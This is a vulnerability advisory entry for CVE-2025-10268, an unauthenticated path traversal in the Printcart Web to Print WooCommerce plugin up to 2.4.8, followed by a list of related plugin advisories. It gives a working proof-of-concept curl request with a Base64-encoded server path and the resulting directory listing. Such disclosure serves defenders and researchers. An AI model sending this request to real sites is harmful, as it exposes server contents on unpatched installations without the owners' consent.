Printcart Web to Print Product Designer for WooCommerce <= 2.4.8 – Unauthenticated Folder Content Disclosure via Path Traversal | CVE 2025-10268 | Plugin Vulnerabilities

Description

The plugin is vulnerable to path traversal which makes it possible for the attacker to retrieve the directory listing for arbitrary directories on the server.

Proof of Concept

curl "https://example.com/wp-content/plugins/printcart-integration/includes/gallery_image_exists.php?path=L3Zhci93d3cvaHRtbA==&folder=wp-content"

Where:
- path = L3Zhci93d3cvaHRtbA== → Base64 of /var/www/html
- folder = wp-content

Example Response
{
  "flag":1,
  "images":[
    "uploads",
    "plugins",
    "themes",
    "debug.log"
  ]
}


If the absolute path is correct, the plugin will disclose directory contents without requiring authentication.

If the path is incorrect, the response will be:

{"flag":0}

Affects Plugins

printcart-integration

No known fix

References

CVE

URL

https://www.wordfence.com/threat-intel/vulnerabilities/researchers/d01exploit-official

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

D01EXPLOIT OFFICIAL

Submitter

D01EXPLOIT OFFICIAL

Verified

Yes

WPVDB ID

0cff6fb3-339b-4eb6-969b-b3a43613cc71

Timeline

Publicly Published

2026-06-04 (about 21 days ago)

Added

2026-05-28 (about 28 days ago)

Last Updated

2026-05-28 (about 28 days ago)

Other

Published

Title

Published

2023-11-21

Title

Quttera Web Malware Scanner < 3.4.2.1 - Admin+ Path Traversal

Published

2021-02-08

Title

Digital Publications by Supsystic < 1.6.12 - Authenticated Path Traversal

Published

2022-03-27

Title

Admin Word Count Column <= 2.2 - Unauthenticated Arbitrary File Read

Published

2019-03-14

Title

SG Optimizer <= 5.0.12 - Unauthenticated File Upload

Published

2022-12-21

Title

Images Optimize and Upload CF7 < 2.2.1 - Unauthenticated Arbitrary File Deletion